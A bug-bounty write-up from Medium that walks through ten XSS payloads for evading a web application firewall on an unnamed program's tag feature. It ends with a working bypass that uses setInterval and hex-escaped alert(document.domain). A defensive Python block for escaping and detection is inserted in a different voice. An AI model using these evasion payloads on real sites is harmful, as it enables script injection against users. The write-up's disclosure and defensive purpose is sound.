JUMPING TO THE HELL WITH 10 ATTEMPTS TO BYPASS DEVIL’S WAF:

Ak1T4

Dec 27, 2017 · 4 min read

This is a quick write-up of a WAF bypass on a private BBP, so I will keep the name of the program hidden.

Looking around in the app, I found a tag-entry feature that caught my attention:

So the app basically loads a tag item. I started with this:

### FIRST ATTEMPT:

injection: `"=""'><details open="">`

output is:

`<span>"=""'&gt;&lt;details open=""&gt; (0)</span>`

Nothing…

### SECOND ATTEMPT:

injection: `"=""'></><details open="">`

output is:

`<span>"=""'&gt;&lt;/&gt;&lt;details open=""&gt; (0)</span>`

Nothing…

### THIRD ATTEMPT:

injection: `"=""'></><script></script><details open="">`

output is:

`<span>"=""'&gt;<details open="…" (0)<="" span=""><a href="" class="" rel="1"></a></details></span>`

Bam! We got HTML injection!

NOW … GOING FOR THE PRECIOUS XSS…

### FOURTH ATTEMPT:

I swapped the details tag for svg:

injection: `"=""'></><script></script><svg onload=alert(1)>`

output is:

`<span>"=""'&gt;<svg onload="al…" (1)=""> </svg></span>`

Strange? Yes.. like hell.. with those ugly dots in the DOM too… (the tag itself works fine, as shown above with the details tag)

but no popup :(

### FIFTH ATTEMPT:

injection: `"=""'></><script></script><svg onload"="alert(1)>`

output is:

`<svg onload"="… (1)> </span><a href=" "="" class="" rel="1"></svg>`

WTF? are you kidding me?

wat?

ok ugly motherfucker… now this is personal..

### SIXTH ATTEMPT:

injection: `"=""'></><script></script><svg onload"=""alertonload=alert(1)"">`

output is:

`<span>"=""'&gt;<svg onload"="… (1)" "=""> </svg></span>`

OK, I give up.. this is not working..

### SEVENTH ATTEMPT:

injection: `" ="" '></><script></script><svg onload"="alertonload=alert(1)"" onload=prompt(1)>`

output is:

`onload="prompt</span"><a href="" class="" rel="0"></a></svg></span>`

Oh nice shit! I'm closer.. I can feel it..

I can feel your energy.. ak1t4..

### EIGHTH ATTEMPT:

injection: `` " ="" '></><script></script><svg onload"="alertonload=alert(1)"" onload=prompt`1`> ``

output is:

`` <svg onload"…="" (1)""="" onload="prompt`1`"> </svg> `` :)

BOOM! WE GOT XSS!

OK.. NOW LET'S TRY WITH document.domain:

### NINTH ATTEMPT:

injection: `` " ="" '></><script></script><svg onload"="alertonload=alert(1)"" onload=prompt`document.domain`> ``

output is:

`` <svg onload"…="" (1)""="" onload="prompt`document.domain`"> </svg> `` :(

WTF? The sticky shits are taking the input as a string…

Mmm, IT IS TIME TO CALL A REAL JEDI: MASTER BRUTE COMES TO THE RESCUE AND BRINGS BALANCE TO THE FORCE..

So I asked him how to inject document.domain over the sticky shits `1`;

his reply was:

### FINAL ATTEMPT (with the magic touch of Master Brute :)

injection: `` " ="" '></><script></script><svg onload"="alertonload=alert(1)"" onload=setInterval`alert\x28document.domain\x29` ``

BOOM BABY!
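As an added example (my code, not the author's and not the target program's), here is the output encoding that would have rendered all ten payloads from this post inert, plus a detection check for the two tricks that finally got through: a tagged-template call in an event handler and JS hex escapes. The span template and the regexes are my assumptions about how to model the app, not anything observed in it.

```python
import html
import re

# The ten payloads from this write-up, with Medium's typographic quotes
# restored to the straight quotes the author actually typed.
PAYLOADS = [
    '"=""\'><details open="">',
    '"=""\'></><details open="">',
    '"=""\'></><script></script><details open="">',
    '"=""\'></><script></script><svg onload=alert(1)>',
    '"=""\'></><script></script><svg onload"="alert(1)>',
    '"=""\'></><script></script><svg onload"=""alertonload=alert(1)"">',
    '" ="" \'></><script></script><svg onload"="alertonload=alert(1)"" onload=prompt(1)>',
    '" ="" \'></><script></script><svg onload"="alertonload=alert(1)"" onload=prompt`1`>',
    '" ="" \'></><script></script><svg onload"="alertonload=alert(1)"" onload=prompt`document.domain`>',
    '" ="" \'></><script></script><svg onload"="alertonload=alert(1)"" onload=setInterval`alert\\x28document.domain\\x29`',
]

def render_tag(user_input: str, count: int = 0) -> str:
    """Render the tag label the way the app should have: entity-encode the
    user text for an HTML text context before concatenating it into the
    span (assumed template), so markup characters never reach the parser as markup."""
    return f"<span>{html.escape(user_input, quote=True)} ({count})</span>"

def is_inert(rendered: str) -> bool:
    """True when the user-controlled part of the span holds no raw <, >, " or '."""
    body = rendered[len("<span>"):rendered.rindex(" (")]
    return not any(ch in body for ch in "<>\"'")

# Detection for a WAF or log rule (assumed patterns): an on* handler attribute
# whose value is a tagged-template call (backticks instead of parentheses) or
# contains JS hex escapes, the two tricks that carried attempts 8 to 10 past the filter.
HANDLER_TEMPLATE_CALL = re.compile(r"\bon\w+\s*=\s*[\"']?\s*[\w.$]+\s*`", re.I)
JS_HEX_ESCAPE = re.compile(r"\\x[0-9a-f]{2}", re.I)

def flags_bypass(payload: str) -> bool:
    """True when the payload uses either of the two bypass tricks above."""
    return bool(HANDLER_TEMPLATE_CALL.search(payload) or JS_HEX_ESCAPE.search(payload))

if __name__ == "__main__":
    for n, p in enumerate(PAYLOADS, 1):
        print(f"attempt {n}: inert={is_inert(render_tag(p))} flagged={flags_bypass(p)}")
```

With proper encoding every attempt stays plain text inside the span; only attempts 8, 9 and 10 trip the detection rule, which is what you would expect a WAF signature for this bypass to catch.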

*THANKS TO MASTER BRUTELOGIC FOR GUIDING ME TO THE FINAL DESTINY :)

XSS is not my field, so I feel like:

May the force be with you — happy hacking :)

P.S.: I'm not a coder; I hack by common and logical sense. All criticism is always welcome so I can improve. I hope you enjoyed reading this as much as I enjoyed writing it.

Ak1T4

Written by

Ak1T4

WhiteHat Hacker Zen Monk & Bounty Hunter

InfoSec Write-ups

A collection of write-ups from the best hackers in the world on topics ranging from bug bounties and CTFs to vulnhub machines, hardware challenges and real life encounters. In a nutshell, we are the largest InfoSec publication on Medium. Maintained by Hackrew